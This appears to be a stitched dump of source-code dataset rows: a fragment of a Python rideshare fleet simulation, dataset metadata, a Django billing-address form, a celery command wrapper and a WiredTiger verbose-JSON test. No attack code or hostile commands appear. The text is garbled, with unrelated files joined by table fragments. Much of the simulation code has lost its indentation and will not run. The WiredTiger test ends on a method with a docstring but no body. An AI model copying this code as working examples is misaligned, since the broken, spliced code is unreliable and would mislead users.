    # Candidate next positions, indexed to match directional_demand.
    target_pixel = [(current_x + 1, current_y),
                    (current_x, current_y + 1),
                    (current_x - 1, current_y),
                    (current_x, current_y - 1)]
    superpixel = pixel_ops.get_superpixel_degree_n(current_p, local_demand_degree)
    for city_pixel, pixel_demand in beliefs.iteritems():
        if city_pixel in superpixel:
            (pixel_x, pixel_y) = city_pixel
            demand_value = pixel_demand[generic_ops.get_day_code(day)][time_block][0]
            # A diagonal pixel contributes to both of its component
            # directions (e.g. up-right counts toward right AND up).
            if pixel_x > current_x:
                directional_demand[0] += demand_value
            if pixel_y > current_y:
                directional_demand[1] += demand_value
            if pixel_x < current_x:
                directional_demand[2] += demand_value
            if pixel_y < current_y:
                directional_demand[3] += demand_value
    # max over (value, index) pairs: ties resolve to the larger index,
    # i.e. the later direction in right/up/left/down order.
    return target_pixel[max((v, i) for i, v in enumerate(directional_demand))[1]]
def handle_empty_repositioning(vehicles_log, time, beliefs, local_demand_degree):
    '''Moves vehicle using LEVRS.

    Any vehicle whose last ping predates `time` is considered idle and is
    nudged one pixel toward the direction of highest believed local
    demand.  Returns the updated vehicles_log.
    '''
    time_block = generic_ops.get_time_block_from_time(time)
    day_of_week = generic_ops.get_day_of_week_from_time(time)
    empty_vehicles = list()
    for vehicle_id in vehicles_log:
        vehicle = vehicles_log[vehicle_id]
        last_pinged_time = vehicle.time_of_last_ping
        # Idle test: no ping at or after the current tick.
        if last_pinged_time < time:
            empty_vehicles.append(vehicle)
    if len(empty_vehicles) == 0:
        return vehicles_log
    for empty_vehicle in empty_vehicles:
        current_loc = empty_vehicle.most_recently_pinged_location
        incremental_reposition = local_demand_predictor(\
            current_loc, day_of_week, time_block, beliefs, local_demand_degree)
        vehicles_log[empty_vehicle.vehicle_id] = \
            empty_vehicle.empty_reposition(time, incremental_reposition)
    return vehicles_log
def initial_vehicle_log(trip_log, fleet_size):
    '''Create the initial vehicles_log.

    Seeds one Vehicle per trip for the first fleet_size trips: vehicle i
    starts wherever trip i drops off, at trip i's dropoff time, credited
    with that trip's mileage.
    '''
    # NOTE(review): relies on generic_ops.list_from_dict yielding trips in
    # a meaningful order -- verify, since plain dicts are unordered in
    # Python 2.
    list_trip_log = generic_ops.list_from_dict(trip_log)
    first_n_trips = list_trip_log[:fleet_size]
    vehicles_log = dict()
    vehicle_id = 0
    for trip_id, trip in first_n_trips:
        cumulative_person_miles = trip_ops.get_person_miles_of_joined_trip(trip_log, trip_id)
        cumulative_vehicle_miles = trip_ops.get_vehicle_miles_of_joined_trip(trip_log, trip_id)
        vehicle = Vehicle(\
            vehicle_id,
            [trip.trip_id],
            0,
            trip.dropoff_pixel,
            trip.dropoff_time,
            cumulative_person_miles,
            cumulative_vehicle_miles\
            )
        vehicles_log[vehicle_id] = vehicle
        vehicle_id += 1
    return vehicles_log
def find_best_common_origin_seq(trip_list, max_circuity, max_stops):
    '''Given a list of trips, find the best rideshared route.

    Runs a Hamiltonian-path search over the trips' stops and validates
    the resulting stop sequence against the max_stops and max_circuity
    constraints.  Returns the sequence of (pixel, trip) pairs after the
    shared origin, or None if any constraint is violated.
    '''
    path = pixel_ops.hamilton_of_trip_list(trip_list)[1]
    distinct_stops = dict()
    origin_pixel = path[0][0]
    prev_destination = origin_pixel
    circuity_distance = 0
    # Check if every trip in path meets the max circuity constraint and max stops constraint
    # If constraints are met then this should NOT return None
    for pair in path[1:]:
        destination_pixel = pair[0]
        # Count each distinct stop once toward the stop limit.
        distinct_stops[destination_pixel] = True
        if len(distinct_stops) > max_stops:
            return None
        direct_manhattan_distance = pixel_ops.manhattan_distance(origin_pixel, destination_pixel)
        # Cumulative distance actually driven along the route so far.
        circuity_distance += pixel_ops.manhattan_distance(prev_destination, destination_pixel)
        prev_destination = destination_pixel
        if direct_manhattan_distance != 0:
            # Circuity = driven distance so far / direct origin->stop distance.
            ratio = 1.0 * circuity_distance / direct_manhattan_distance
            if ratio > max_circuity:
                return None
    return path[1:]
def predispatched_trips(trip_log, trip_location_hash_table, pickup_pixel):
'''Get the predispatched trips from a certain pickup_pixel.'''
trip = list(trip_location_hash_table[pickup_pixel])[-1][1]
return trip_ops.get_all_joined_trips(trip_log, trip.trip_id)
def optimal_route(trip, trip_log, trip_location_hash_table,
pickup_pixel, constraints):
'''Get the optimal route of rideshared trips'''
optimal_preorder = predispatched_trips( \
trip_log, trip_location_hash_table, pickup_pixel)
optimal_preorder += [trip]
optimal_order = find_best_common_origin_seq(optimal_preorder,
constraints['max_circuity'],
constraints['max_stops'])
return optimal_order
def sync_joined_trips(trip_log, trip_id, dispatch_time):
'''Sync the data for rideshared trips.'''
trip = trip_ops.get_trip(trip_log, trip_id)
vehicle_id = trip.vehicle_id
joined_trip_id = trip.joined_trip_id
pickup_location = trip.pickup_pixel
trip.pickup_time = dispatch_time
time_elapsed = pixel_ops.time_of_travel(pickup_location, trip.dropoff_pixel)
trip.dropoff_time = dispatch_time + time_elapsed
# For each subsequent trip, update the time elapsed to reach destination
# Update the vehicle id
while True:
joined_trip = trip_ops.get_trip(trip_log, joined_trip_id)
time_elapsed += pixel_ops.time_of_travel(trip.dropoff_pixel, joined_trip.dropoff_pixel)
joined_trip = joined_trip.set_actual_t(dispatch_time, dispatch_time + time_elapsed)
joined_trip = joined_trip.set_vehicle(vehicle_id)
trip_id = joined_trip_id
joined_trip_id = joined_trip.joined_trip_id
if joined_trip_id == trip_id:
break
return trip_log
def send_vehicle_for_this_request(trip_log, trip_id, vehicle_info, vehicles_log, constraints):
'''Assign vehicle to trip request.'''
departure_delay = constraints['departure_delay']
assert(vehicle_info is not None), "Vehicle Info is None"
vehicle_id = vehicle_info['vehicle_id']
time_delay = vehicle_info['time_delay']
# Update vehicle ID
trip = trip_ops.get_trip(trip_log, trip_id)
trip.vehicle_id = vehicle_id
# Update trip's time delay
trip = trip.increase_time_delay(max(time_delay, departure_delay))
# Update trip log
trip_log[trip_id] = trip
# Update vehicle log accordingly
vehicles_log[vehicle_id].add_trip_to_schedule(trip) # this causes absurd scale
return trip_log, vehicles_log
def get_vehicles_latest_trips(vehicles_log):
'''Get the latest scheduled location and time of all vehicles.'''
vehicle_locations = dict()
for vehicle in vehicles_log.values():
vehicle_locations[vehicle.vehicle_id] = \
(vehicle.most_recently_pinged_location, vehicle.time_of_last_ping)
return vehicle_locations
def vehicle_min_arrival_time(trip_log, trip_id, vehicles_log):
'''Get the vehicle that will arrive soonest for trip_id.'''
vehicles_latest_trips = get_vehicles_latest_trips(vehicles_log)
trip = trip_ops.get_trip(trip_log, trip_id)
request_time = trip.pickup_request_time
# Get the vehicle that can arrive soonest (with travel estimate)
closest_vehicle_info = None
min_time = sys.maxint
for vehicle_id, (pre_repositioned_location, pre_repositioned_time) \
in vehicles_latest_trips.items():
travel_time = pixel_ops.time_of_travel(pre_repositioned_location, trip.pickup_pixel)
# Vehicle is already there, use it
if travel_time == 0.0:
return (vehicle_id, pre_repositioned_location, 0.0)
time_vehicle_would_arrive = \
max(pre_repositioned_time, request_time) + travel_time
if time_vehicle_would_arrive < min_time:
min_time = time_vehicle_would_arrive
time_delay = time_vehicle_would_arrive - request_time
assert(time_delay >= 0), \
"""
Time Delay is negative: %s
Trip: %s
Pre Repositioned Time: %s
Pre Repositioned Location: %s
Request Time: %s
Travel Time: %s
Time Vehicle Would Arrive Here: %s
""" % (str(time_delay),
str(trip.__dict__),
str(pre_repositioned_time),
str(pre_repositioned_location),
str(request_time),
str(travel_time),
str(time_vehicle_would_arrive))
closest_vehicle_info = {"vehicle_id" : vehicle_id,
"pre_repositioned_location" : pre_repositioned_location,
"time_delay" : time_delay}
assert(min_time != sys.maxint), "Closest Vehicle not selected"
return closest_vehicle_info
def get_vehicle_for_this_trip(trip_log, trip_id, vehicles_log):
'''Get the vehicle to be assigned for this trip.'''
vehicle = vehicle_min_arrival_time(trip_log, trip_id, vehicles_log)
return vehicle
def do_request_new_vehicle(trip_log, trip_id, vehicles_log,
constraints, trip_buffer, trip_location_hash_table):
'''Request a new vehicle for this trip, handle info'''
# Helper variables
trip = trip_ops.get_trip(trip_log, trip_id)
pickup_pixel, dropoff_pixel = (trip.pickup_pixel, trip.dropoff_pixel)
# Need to a request a new vehicle for this trip
# (1) Identify which vehicle is needed
# (2) Update data structures to link this trip request to that vehicle and "send vehicle"
vehicle_for_this_trip = get_vehicle_for_this_trip(trip_log, trip_id, vehicles_log)
trip_log, vehicles_log = send_vehicle_for_this_request(trip_log, trip_id,
vehicle_for_this_trip,
vehicles_log, constraints)
# We want to put this trip, therefore, in the trip fulfillment queue and location dict
trip_buffer = generic_ops.deque_put_in_place(trip_buffer, (trip, trip.pickup_time))
trip_location_hash_table[pickup_pixel].append((dropoff_pixel, trip))
return trip_log, vehicles_log
def is_this_vehicles_latest_loc(trip_log, vehicles_log,
trip_location_hash_table, pickup_pixel):
'''Is the vehicle's latest scheduled trip the latest trip scheduled at this pickup pixel?'''
if len(trip_location_hash_table[pickup_pixel]) == 0:
return False
the_trip_scheduled_from_this_origin = trip_location_hash_table[pickup_pixel][-1]
trip = the_trip_scheduled_from_this_origin[1]
last_common_origin_trip = trip_ops.get_last_joined_trip(trip_log, trip.trip_id)
vehicle_id = last_common_origin_trip.vehicle_id
the_latest_trip_scheduled_with_this_vehicle = vehicles_log[vehicle_id].latest_trip
return str(the_latest_trip_scheduled_with_this_vehicle) == str(trip.trip_id)
def get_joined_trip_occupants(trip_legs):
'''Get the number of total occupants for all trip legs of a rideshared trip'''
total = 0
for trip_leg in trip_legs:
total += trip_leg.occupancy
return total
def common_origin_validation(trip_location_hash_table, trip_log,
vehicles_log, new_trip_request, constraints):
'''Run the common origin validation process'''
vehicle_size = constraints['vehicle_size']
request_new_vehicle = True
optimal_order = None
pickup_pixel = new_trip_request.pickup_pixel
there_exists_undispatched_vehicle_from_this_origin = \
len(trip_location_hash_table[pickup_pixel]) > 0
# If there exists a vehicle from this origin
if there_exists_undispatched_vehicle_from_this_origin:
# This is the Greedy Common Origin Trip Sender
# If the vehicle's latest undispatched trip is not from this origin,
# then request a new vehicle
if not is_this_vehicles_latest_loc(trip_log,
vehicles_log,
trip_location_hash_table,
pickup_pixel):
request_new_vehicle = True
else:
# Get pickup time of the trip
first_leg_of_trip_here = list(trip_location_hash_table[pickup_pixel])[0][1]
if new_trip_request.pickup_request_time > first_leg_of_trip_here.pickup_time:
request_new_vehicle = True
else:
# SUBJECT TO vehicle_size CONSTRAINT
current_joined_trip = [that_trip[1] \
for that_trip \
in list(trip_location_hash_table[pickup_pixel])]
current_vehicle_occupancy = get_joined_trip_occupants(current_joined_trip)
vehicle_would_exceed_capacity = \
current_vehicle_occupancy + new_trip_request.occupancy > vehicle_size
if vehicle_would_exceed_capacity:
request_new_vehicle = True
else:
# SUBJECT TO MAX CIRCUITY AND MAX STOPS CONSTRAINTS
optimal_order = optimal_route(new_trip_request,
trip_log,
trip_location_hash_table,
pickup_pixel,
constraints)
request_new_vehicle = optimal_order is None
return request_new_vehicle, optimal_order
def resequence_joined_trip_ids(trip_log, ordered_joined_trips):
'''Resync joined trip ids'''
for i in range(0, len(ordered_joined_trips) - 1):
trip = ordered_joined_trips[i]
trip.joined_trip_id = ordered_joined_trips[i + 1].trip_id
last_trip = ordered_joined_trips[-1]
last_trip.joined_trip_id = last_trip.trip_id
return trip_log
def greedy_common_origin_scheduler(trip_log, vehicles_log, trip_location_hash_table,
trip_buffer, new_trip_request, optimal_order):
'''Run Greedy Common Origin Strategy heuristic'''
pickup_pixel = new_trip_request.pickup_pixel
optimal_order_CO_destinations = [trip[1] for trip in optimal_order]
new_first_trip_of_route = optimal_order_CO_destinations[0]
scheduled_trip_from_this_origin = list(trip_location_hash_table[pickup_pixel])[-1][1]
pickup_time = scheduled_trip_from_this_origin.pickup_time
vehicle_id = scheduled_trip_from_this_origin.vehicle_id
trip_log = resequence_joined_trip_ids(trip_log, optimal_order_CO_destinations)
vehicles_log[vehicle_id] = \
vehicles_log[vehicle_id].replace_last_trip(new_first_trip_of_route)
new_trip_request.set_vehicle(vehicle_id)
sync_joined_trips(trip_log, new_first_trip_of_route.trip_id, pickup_time)
generic_ops.deque_replace(trip_buffer,
(scheduled_trip_from_this_origin, pickup_time),
(new_first_trip_of_route, pickup_time))
trip_location_hash_table[pickup_pixel].popleft()
trip_location_hash_table[pickup_pixel].append((optimal_order[0][0], new_first_trip_of_route))
return trip_log, vehicles_log, trip_location_hash_table
def process_request(trip_log, trip, vehicles_log,
constraints, trip_location_hash_table, trip_buffer):
'''Run the general process for a single trip request'''
greedy = constraints['greedy_common_origin']
request_new_vehicle = True # default true, but turn false if vehicle is available
# Helper variables
new_trip_request = trip
pickup_pixel = new_trip_request.pickup_pixel
# If the origin point has NOT been accounted for yet then set it up as
# an empty deque of destination points
if pickup_pixel not in trip_location_hash_table.keys():
trip_location_hash_table[pickup_pixel] = deque()
# Determine whether to request new vehicle or not
request_new_vehicle, optimal_order = common_origin_validation(\
trip_location_hash_table, trip_log, vehicles_log, new_trip_request, constraints)
# HACK: to make sure that pickup_request time is not after pickup time
if optimal_order is not None:
pickup_pixel = new_trip_request.pickup_pixel
new_first_trip_of_route = optimal_order[0][1]
scheduled_trip_from_this_origin = list(trip_location_hash_table[pickup_pixel])[-1][1]
pickup_time = scheduled_trip_from_this_origin.pickup_time
if new_first_trip_of_route.pickup_request_time > pickup_time:
request_new_vehicle = True
# Request a vehicle from the fleet
if request_new_vehicle:
trip_log, vehicles_log = \
do_request_new_vehicle(trip_log,
trip.trip_id,
vehicles_log,
constraints,
trip_buffer,
trip_location_hash_table)
# Enter RIDESHARE process
# Greedy Heuristic
else:
if greedy:
trip_log, vehicles_log, trip_location_hash_table = \
greedy_common_origin_scheduler(trip_log,
vehicles_log,
trip_location_hash_table,
trip_buffer,
new_trip_request,
optimal_order)
return trip_log, vehicles_log
def handle_requests_at_this_time(trip_log, vehicles_log,
requests, constraints,
trip_location_hash_table, trip_buffer, beliefs):
'''Run the processes for all requests in this batch'''
list_of_trip_requests_now = requests
for trip in list_of_trip_requests_now:
trip_log[trip.trip_id] = trip
trip_log, vehicles_log = process_request(trip_log,
trip,
vehicles_log,
constraints,
trip_location_hash_table,
trip_buffer)
if int(constraints['freq_levrs']) != 0:
betas = {'initial' : constraints['initial_beta'], 'obs' : constraints['beta_obs']}
beliefs = demand_learning.update_belief_model(trip, beliefs, betas)
return trip_log, vehicles_log, beliefs
def clear_trips_for_dispatch(trip_log, dispatch_time, vehicles_log,
trip_location_hash_table,
trip_buffer, dict_writer):
'''Send dispatched files to output, remove from data structures'''
if len(trip_buffer) < 1:
return trip_location_hash_table, trip_buffer
while len(trip_buffer) > 0:
next_to_dispatch_trip, next_to_dispatch_pickup_time = trip_buffer[0]
if floor(next_to_dispatch_pickup_time) <= floor(dispatch_time):
pickup_pixel = next_to_dispatch_trip.pickup_pixel
vehicle_id = next_to_dispatch_trip.vehicle_id
vehicles_log[vehicle_id].cumulative_person_miles += \
trip_ops.get_person_miles_of_joined_trip(trip_log, next_to_dispatch_trip.trip_id)
vehicles_log[vehicle_id].cumulative_vehicle_miles += \
trip_ops.get_vehicle_miles_of_joined_trip(trip_log, next_to_dispatch_trip.trip_id)
all_joined_trips = trip_ops.get_all_joined_trips(trip_log,
next_to_dispatch_trip.trip_id)
for that_trip in all_joined_trips:
assert(that_trip.valid()), "Trip being written is invalid" # this needs to be true
dict_writer.writerow(that_trip.__dict__)
del trip_log[that_trip.trip_id]
trip_buffer.popleft()
trip_location_hash_table[pickup_pixel].popleft()
else:
break
return
def receive_requests_now(reader, time, rollover_request):
'''Listen for requests at this time from the stream'''
if rollover_request is None:
requests_now = list()
else:
requests_now = [rollover_request]
while True:
try:
next_line = reader.next()
trip = trip_ops.process_cleaned_trip(next_line)
if trip.pickup_request_time > time:
return requests_now, trip
else:
requests_now.append(trip)
except StopIteration:
return None, None
def handle_all_trip_requests(constraints):
    '''Main simulation loop.

    Reads trip requests from the cleaned input stream, matches and joins
    them to vehicles, dispatches due trips to the results file, and
    optionally performs empty-vehicle repositioning (LEVRS).  Returns the
    final ``vehicles_log``.
    '''
    fleet_size          = constraints['fleet_size']
    beliefs             = constraints['beliefs']
    local_demand_degree = constraints['local_demand_degree']
    freq_levrs          = int(constraints['freq_levrs'])
    cleaned_filepath    = generic_ops.cleaned_fp(constraints['raw'])
    result_filepath     = generic_ops.results_fp(constraints['raw'], constraints['index'])
    #-------------------------------------------------------- START READER OPS
    inputfile = open(cleaned_filepath, 'rb')
    reader = csv.DictReader(inputfile)
    initial_trip_log = trip_ops.read_n_cleaned_trips(reader, fleet_size)
    #-------------------------------------------------------- END READER OPS
    #-------------------------------------------------------- START WRITER OPS
    open(result_filepath, 'w').close() # reset the output file
    # BUG FIX: 'wa' is not a valid open mode; append to the (just reset)
    # output file instead.
    outputfile = open(result_filepath, 'a')
    # list() wrapper makes the dict-view indexing work on both
    # Python 2 and Python 3.
    keys = list(initial_trip_log.values())[0].__dict__.keys()
    dict_writer = csv.DictWriter(outputfile, keys)
    dict_writer.writeheader()
    for trip in initial_trip_log.values():
        dict_writer.writerow(trip.__dict__)
    #-------------------------------------------------------- END WRITER OPS
    # trip_location_hash_table is a data structure that is a dict of trip origin points,
    # each origin point contains a list of trips scheduled to leave from that point,
    # represented solely by the trip that is the first-stop of that trip
    # trip_buffer is a double-queue data structure that enqueues requests as they come in
    # and dequeues them when they are dispatched.
    # trip_log is a dict that is synced with the trip_buffer,
    # contains more detailed info about trips
    trip_location_hash_table = dict()
    trip_buffer = deque()
    # Transform Trip Log to Be Index By Vehicle ID
    vehicles_log = initial_vehicle_log(initial_trip_log, fleet_size)
    # Get time of last initial pickup request.
    # NOTE(review): this relies on the iteration order of initial_trip_log;
    # confirm that read_n_cleaned_trips preserves request order.
    start_time = list(initial_trip_log.values())[-1].pickup_request_time
    # Clear this variable to save memory
    initial_trip_log = None
    trip_log = dict()
    time = start_time
    rollover_request = None
    while True:
        requests, rollover_request = receive_requests_now(reader, time, rollover_request)
        # There are no incoming trip requests or trips left to dispatch. End Loop
        if requests is None and len(trip_buffer) == 0:
            break
        # There are trip requests this turn. Process them.
        # BUG FIX: the old 'len(requests) >= 0' test was always true;
        # only process when there are actually requests this turn.
        if requests:
            trip_log, vehicles_log, beliefs = \
                handle_requests_at_this_time(trip_log,
                                             vehicles_log,
                                             requests,
                                             constraints,
                                             trip_location_hash_table,
                                             trip_buffer,
                                             beliefs)
        # Clear trips ready for dispatch at this time.
        # BUG FIX: arguments were previously passed in the wrong order
        # (vehicles_log as dispatch_time, constraints as vehicles_log).
        clear_trips_for_dispatch(trip_log,
                                 time,
                                 vehicles_log,
                                 trip_location_hash_table,
                                 trip_buffer,
                                 dict_writer)
        # LEVRS Handling
        if freq_levrs != 0 and time % freq_levrs == 0:
            vehicles_log = \
                handle_empty_repositioning(vehicles_log, time, beliefs, local_demand_degree)
        time += 1 # next iteration of time
    outputfile.close()
    # BUG FIX: the input file was previously never closed (resource leak).
    inputfile.close()
    assert(len(trip_log) == 0), "There were %s undispatched trips." % (str(len(trip_log)))
    return vehicles_log
| 0 | 0 | 0 |
914cfd77d3892cb4712872995721e9e8cf776aec | 1,212 | py | Python | core/forms.py | Jokotoye18/DjangoEcommerce | ce17e7a36cff72623f67eb01221bdec323ebfb31 | [
"MIT"
] | null | null | null | core/forms.py | Jokotoye18/DjangoEcommerce | ce17e7a36cff72623f67eb01221bdec323ebfb31 | [
"MIT"
] | 4 | 2021-03-30T14:22:12.000Z | 2021-06-10T19:35:45.000Z | core/forms.py | Jokotoye18/DjangoEcommerce | ce17e7a36cff72623f67eb01221bdec323ebfb31 | [
"MIT"
] | null | null | null | from django import forms
from .models import BillingAddress
from django_countries.fields import CountryField
from django_countries.widgets import CountrySelectWidget
PAYMENT_METHOD = (
('S', 'stripe'),
('P', 'paypal')
) | 46.615385 | 130 | 0.70132 | from django import forms
from .models import BillingAddress
from django_countries.fields import CountryField
from django_countries.widgets import CountrySelectWidget
PAYMENT_METHOD = (
('S', 'stripe'),
('P', 'paypal')
)
class BillingAddressForm(forms.ModelForm):
    """Checkout form collecting a customer's billing address.

    Extends the :class:`BillingAddress` model form with three extra,
    form-only fields: two Bootstrap-styled checkboxes and a payment-method
    radio select driven by ``PAYMENT_METHOD``.
    """
    # Extra form-only fields (not stored on the model directly).
    same_billing_address = forms.BooleanField(widget=forms.CheckboxInput(attrs={'class': 'custom-control-input'}), required=False)
    save_info = forms.BooleanField(widget=forms.CheckboxInput(attrs={'class': 'custom-control-input'}), required=False)
    payment_options = forms.ChoiceField(widget=forms.RadioSelect(), choices=PAYMENT_METHOD)
    class Meta:
        model = BillingAddress
        # NOTE(review): 'same_billing_address', 'save_info' and
        # 'payment_options' are declared on the form, not the model —
        # confirm the project's Django version accepts them in Meta.fields.
        fields = ['street_address', 'apartment_address', 'country', 'zip', 'same_billing_address', 'save_info', 'payment_options']
        # Bootstrap widget/placeholder configuration for the model fields.
        widgets = {
            'street_address': forms.TextInput(attrs={'placeholder':'1234 Main St', 'class':'form-control'}),
            'apartment_address': forms.TextInput(attrs={'placeholder':'Apartment or suite', 'class':'form-control'}),
            'zip': forms.TextInput(attrs={'class':'form-control'}),
            'country': CountrySelectWidget(attrs={'class': 'custom-select d-block w-100'})
} | 0 | 960 | 23 |
1059d59a682bc6b834dfb4596560d911b23842dc | 485 | py | Python | sea/contrib/extensions/celery/cmd.py | leesnhyun/sea | 40796be02b43ad1a1e79c54765b755fe67442e36 | [
"MIT"
] | null | null | null | sea/contrib/extensions/celery/cmd.py | leesnhyun/sea | 40796be02b43ad1a1e79c54765b755fe67442e36 | [
"MIT"
] | null | null | null | sea/contrib/extensions/celery/cmd.py | leesnhyun/sea | 40796be02b43ad1a1e79c54765b755fe67442e36 | [
"MIT"
] | null | null | null | import sys
from celery.__main__ import main as celerymain
from sea.cli import jobm
@jobm.job("async_task", proxy=True, help="invoke celery cmds for async tasks")
@jobm.job("bus", proxy=True, help="invoke celery cmds for bus")
| 21.086957 | 78 | 0.665979 | import sys
from celery.__main__ import main as celerymain
from sea.cli import jobm
def celery(argv, app):
    """Invoke the celery command line with ``argv``, targeting the celery
    application registered as ``app`` under ``app.extensions``.
    """
    # Build the argument vector piece by piece, then hand
    # control over to celery's own entry point.
    cmd = ["celery"]
    cmd += argv
    cmd += ["-A", "app.extensions:{app}".format(app=app)]
    sys.argv = cmd
    return celerymain()
@jobm.job("async_task", proxy=True, help="invoke celery cmds for async tasks")
def async_task(argv):
    """Proxy ``argv`` to the celery CLI for the ``async_task`` app."""
    return celery(argv, "async_task")
@jobm.job("bus", proxy=True, help="invoke celery cmds for bus")
def bus(argv):
    """Proxy ``argv`` to the celery CLI for the ``bus`` app."""
    return celery(argv, "bus")
| 185 | 0 | 67 |
37788a8ca874e96f8e6c2587f107172bb4db2bb4 | 7,274 | py | Python | src/third_party/wiredtiger/test/suite/test_verbose03.py | benety/mongo | 203430ac9559f82ca01e3cbb3b0e09149fec0835 | [
"Apache-2.0"
] | null | null | null | src/third_party/wiredtiger/test/suite/test_verbose03.py | benety/mongo | 203430ac9559f82ca01e3cbb3b0e09149fec0835 | [
"Apache-2.0"
] | null | null | null | src/third_party/wiredtiger/test/suite/test_verbose03.py | benety/mongo | 203430ac9559f82ca01e3cbb3b0e09149fec0835 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
#
# Public Domain 2014-present MongoDB, Inc.
# Public Domain 2008-2014 WiredTiger, Inc.
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
from contextlib import contextmanager
import wiredtiger, wttest
from test_verbose01 import test_verbose_base
import json
# test_verbose03.py
# Tests that when enabling JSON-encoded messages through the event handler interface, valid JSON
# is produced. Valid messages are those that can be successfully parsed as JSON (meeting the JSON
# standard) and subscribe to an expected schema (i.e. meet expected fields and types).
if __name__ == '__main__':
wttest.run()
| 47.855263 | 135 | 0.678994 | #!/usr/bin/env python
#
# Public Domain 2014-present MongoDB, Inc.
# Public Domain 2008-2014 WiredTiger, Inc.
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
from contextlib import contextmanager
import wiredtiger, wttest
from test_verbose01 import test_verbose_base
import json
# test_verbose03.py
# Tests that when enabling JSON-encoded messages through the event handler interface, valid JSON
# is produced. Valid messages are those that can be successfully parsed as JSON (meeting the JSON
# standard) and subscribe to an expected schema (i.e. meet expected fields and types).
class test_verbose03(test_verbose_base):
    """Checks that JSON-encoded verbose/error messages emitted through the
    event handler interface are valid JSON and match the expected schema
    and category set.
    """
    # The maximum number of lines we will read from stdout/stderr in any given context.
    nlines = 50000
    @contextmanager
    def expect_event_handler_json(self, config, expected_categories, stdErr=False):
        """Context manager: opens a connection with JSON output enabled,
        yields it to the caller, then parses and validates every JSON
        message captured on stdout (or stderr when ``stdErr`` is set).
        """
        # Clean the stdout/stderr resource before yielding the context to the execution block. We only want to
        # capture the verbose output of the using context (ignoring any previous output up to this point).
        if stdErr:
            self.cleanStderr()
        else:
            self.cleanStdout()
        # Create a new connection with JSON format enabled.
        if stdErr:
            conn_config = 'json_output=[error]'
        else:
            conn_config = 'json_output=[message]'
        if config != "":
            conn_config += "," + config
        conn = self.wiredtiger_open(self.home, conn_config)
        # Yield the connection resource to the execution context, allowing it to perform any necessary
        # operations on the connection (for generating the expected message output).
        yield conn
        # Read the contents of stdout/stderr to extract our messages.
        output = self.readStderr(self.nlines) if stdErr else self.readStdout(self.nlines)
        # Split the output into their individual messages. We want validate the contents of each message
        # to ensure we've only generated JSON messages.
        messages = output.splitlines()
        if len(output) >= self.nlines:
            # If we've read the maximum number of characters, its likely that the last line is truncated ('...'). In this
            # case, trim the last message as we can't parse it.
            messages = messages[:-1]
        # Test the contents of each verbose message, ensuring we can successfully parse the JSON and that is subscribes
        # to the expected schema.
        for line in messages:
            try:
                msg = json.loads(line)
            except Exception as e:
                self.pr('Unable to parse JSON message format: %s' % line)
                raise e
            self.validate_json_schema(msg)
            self.validate_json_category(msg, expected_categories)
        # Close the connection resource and clean up the contents of the stdout/stderr file, flushing out the
        # verbose output that occurred during the execution of this context.
        conn.close()
        if stdErr:
            self.cleanStderr()
        else:
            self.cleanStdout()
    # Test use cases passing sets of verbose categories, ensuring the verbose messages follow a valid JSON schema.
    def test_verbose_json_message(self):
        """Exercise the 'api' and 'api,version' verbose categories and
        validate the JSON messages they produce on stdout.
        """
        # Close the initial connection. We will be opening new connections with different verbosity settings throughout
        # this test.
        self.close_conn()
        expected_verbose_categories = {
            'WT_VERB_API': wiredtiger.WT_VERB_API,
            'WT_VERB_VERSION': wiredtiger.WT_VERB_VERSION,
        }
        # Test passing a single verbose category, 'api'.
        with self.expect_event_handler_json(self.create_verbose_configuration(['api']), expected_verbose_categories) as conn:
            # Perform a set of simple API operations (table creations and cursor operations) to generate verbose API
            # messages.
            uri = 'table:test_verbose03_api'
            session = conn.open_session()
            session.create(uri, 'key_format=S,value_format=S')
            c = session.open_cursor(uri)
            c['api'] = 'api'
            c.close()
            session.close()
        # Test passing multiple verbose categories, being 'api' & 'version'.
        with self.expect_event_handler_json(self.create_verbose_configuration(['api','version']), expected_verbose_categories) as conn:
            # Perform a set of simple API operations (table creations and cursor operations) to generate verbose API
            # messages. Beyond opening the connection resource, we shouldn't need to do anything special for the version
            # category.
            uri = 'table:test_verbose03_multiple'
            session = conn.open_session()
            session.create(uri, 'key_format=S,value_format=S')
            c = session.open_cursor(uri)
            c['multiple'] = 'multiple'
            c.close()
    # Test use cases generating error messages, ensuring the messages follow a valid JSON schema.
    def test_verbose_json_err_message(self):
        """Provoke a WiredTiger error and validate the JSON-encoded error
        message produced on stderr.
        """
